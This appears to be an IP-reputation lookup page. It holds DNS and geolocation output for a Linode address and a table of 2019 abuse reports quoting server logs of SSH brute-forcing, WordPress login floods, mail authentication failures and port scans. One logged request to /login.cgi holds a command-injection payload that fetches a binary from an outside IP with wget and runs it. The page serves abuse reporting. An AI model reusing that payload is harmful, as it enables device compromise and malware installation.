City: Richardson
Region: Texas
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 104.200.21.242
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 35482
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;104.200.21.242. IN A
;; AUTHORITY SECTION:
. 408 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022052200 1800 900 604800 86400
;; Query time: 18 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun May 22 22:56:36 CST 2022
;; MSG SIZE rcvd: 107
242.21.200.104.in-addr.arpa domain name pointer li799-242.members.linode.com.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
242.21.200.104.in-addr.arpa name = li799-242.members.linode.com.
Authoritative answers can be found from:
IP | Type | Details | Datetime |
---|---|---|---|
129.204.205.171 | attackspam | Sep 11 09:06:00 vps200512 sshd\[31063\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.204.205.171 user=mysql Sep 11 09:06:02 vps200512 sshd\[31063\]: Failed password for mysql from 129.204.205.171 port 46760 ssh2 Sep 11 09:13:07 vps200512 sshd\[31263\]: Invalid user admin from 129.204.205.171 Sep 11 09:13:07 vps200512 sshd\[31263\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.204.205.171 Sep 11 09:13:09 vps200512 sshd\[31263\]: Failed password for invalid user admin from 129.204.205.171 port 50160 ssh2 |
2019-09-11 21:22:40 |
86.102.26.45 | attack | Sep 11 02:48:41 tdfoods sshd\[28348\]: Invalid user oracle2017 from 86.102.26.45 Sep 11 02:48:41 tdfoods sshd\[28348\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=86-102-26-45.xdsl.primorye.ru Sep 11 02:48:43 tdfoods sshd\[28348\]: Failed password for invalid user oracle2017 from 86.102.26.45 port 59644 ssh2 Sep 11 02:55:22 tdfoods sshd\[28926\]: Invalid user 12345 from 86.102.26.45 Sep 11 02:55:22 tdfoods sshd\[28926\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=86-102-26-45.xdsl.primorye.ru |
2019-09-11 21:14:27 |
88.247.110.88 | attackspambots | $f2bV_matches |
2019-09-11 21:28:17 |
37.187.100.54 | attackspambots | Sep 11 14:13:56 localhost sshd\[8677\]: Invalid user 1 from 37.187.100.54 port 40032 Sep 11 14:13:56 localhost sshd\[8677\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=37.187.100.54 Sep 11 14:13:58 localhost sshd\[8677\]: Failed password for invalid user 1 from 37.187.100.54 port 40032 ssh2 |
2019-09-11 20:36:49 |
111.93.128.90 | attackspam | Sep 11 07:18:55 aat-srv002 sshd[13855]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.93.128.90 Sep 11 07:18:57 aat-srv002 sshd[13855]: Failed password for invalid user sinusbot from 111.93.128.90 port 16975 ssh2 Sep 11 07:24:06 aat-srv002 sshd[14039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.93.128.90 Sep 11 07:24:07 aat-srv002 sshd[14039]: Failed password for invalid user admin from 111.93.128.90 port 5954 ssh2 ... |
2019-09-11 20:36:14 |
165.22.47.46 | attack | diesunddas.net 165.22.47.46 \[11/Sep/2019:09:52:46 +0200\] "POST /wp-login.php HTTP/1.1" 200 8412 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" diesunddas.net 165.22.47.46 \[11/Sep/2019:09:52:47 +0200\] "POST /wp-login.php HTTP/1.1" 200 8412 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" |
2019-09-11 20:47:13 |
185.36.81.250 | attackspam | 2019-09-11T14:17:18.702672ns1.unifynetsol.net postfix/smtpd\[1523\]: warning: unknown\[185.36.81.250\]: SASL LOGIN authentication failed: authentication failure 2019-09-11T15:11:07.436991ns1.unifynetsol.net postfix/smtpd\[3958\]: warning: unknown\[185.36.81.250\]: SASL LOGIN authentication failed: authentication failure 2019-09-11T16:06:05.958617ns1.unifynetsol.net postfix/smtpd\[6654\]: warning: unknown\[185.36.81.250\]: SASL LOGIN authentication failed: authentication failure 2019-09-11T17:00:13.336672ns1.unifynetsol.net postfix/smtpd\[8472\]: warning: unknown\[185.36.81.250\]: SASL LOGIN authentication failed: authentication failure 2019-09-11T17:55:30.102507ns1.unifynetsol.net postfix/smtpd\[9865\]: warning: unknown\[185.36.81.250\]: SASL LOGIN authentication failed: authentication failure |
2019-09-11 20:48:23 |
104.144.21.135 | attackspambots | Fail2Ban Ban Triggered |
2019-09-11 21:13:43 |
216.158.226.226 | attackspambots | Sep 8 09:53:27 h2421860 postfix/postscreen[26798]: CONNECT from [216.158.226.226]:38482 to [85.214.119.52]:25 Sep 8 09:53:27 h2421860 postfix/dnsblog[26843]: addr 216.158.226.226 listed by domain Unknown.trblspam.com as 185.53.179.7 Sep 8 09:53:27 h2421860 postfix/dnsblog[26799]: addr 216.158.226.226 listed by domain dnsbl.sorbs.net as 127.0.0.6 Sep 8 09:53:27 h2421860 postfix/dnsblog[26800]: addr 216.158.226.226 listed by domain b.barracudacentral.org as 127.0.0.2 Sep 8 09:53:33 h2421860 postfix/postscreen[26798]: DNSBL rank 4 for [216.158.226.226]:38482 Sep 8 09:53:33 h2421860 postfix/tlsproxy[26847]: CONNECT from [216.158.226.226]:38482 Sep 8 09:53:33 h2421860 postfix/tlsproxy[26847]: Anonymous TLS connection established from [216.158.226.226]:38482: TLSv1.2 whostnameh cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bhostnames) Sep x@x Sep 8 09:53:33 h2421860 postfix/tlsproxy[26847]: DISCONNECT [216.158.226.226]:38482 Sep 8 09:53:33 h2421860 postfix/postscreen[2........ ------------------------------- |
2019-09-11 21:06:23 |
103.44.27.58 | attackbots | Sep 11 14:46:22 core sshd[21627]: Invalid user password321 from 103.44.27.58 port 47197 Sep 11 14:46:24 core sshd[21627]: Failed password for invalid user password321 from 103.44.27.58 port 47197 ssh2 ... |
2019-09-11 21:24:20 |
206.81.25.181 | attack | 2019-09-11T12:33:28.992395abusebot-4.cloudsearch.cf sshd\[21321\]: Invalid user www from 206.81.25.181 port 49452 |
2019-09-11 20:57:36 |
178.128.223.28 | attackspambots | Sep 11 09:16:20 TORMINT sshd\[26439\]: Invalid user tomcat from 178.128.223.28 Sep 11 09:16:20 TORMINT sshd\[26439\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.223.28 Sep 11 09:16:22 TORMINT sshd\[26439\]: Failed password for invalid user tomcat from 178.128.223.28 port 51774 ssh2 ... |
2019-09-11 21:25:33 |
172.246.132.66 | attackspam | 445/tcp 445/tcp 445/tcp... [2019-07-25/09-11]15pkt,1pt.(tcp) |
2019-09-11 21:00:48 |
159.65.28.171 | attackbotsspam | Sep 11 07:55:43 ny01 sshd[10185]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=159.65.28.171 Sep 11 07:55:46 ny01 sshd[10185]: Failed password for invalid user sammy from 159.65.28.171 port 39374 ssh2 Sep 11 08:01:00 ny01 sshd[11227]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=159.65.28.171 |
2019-09-11 20:35:14 |
203.135.246.189 | attackspambots | 203.135.246.189 - - [11/Sep/2019:09:52:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://188.241.73.110/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "DEMONS/2.0" ... |
2019-09-11 21:16:46 |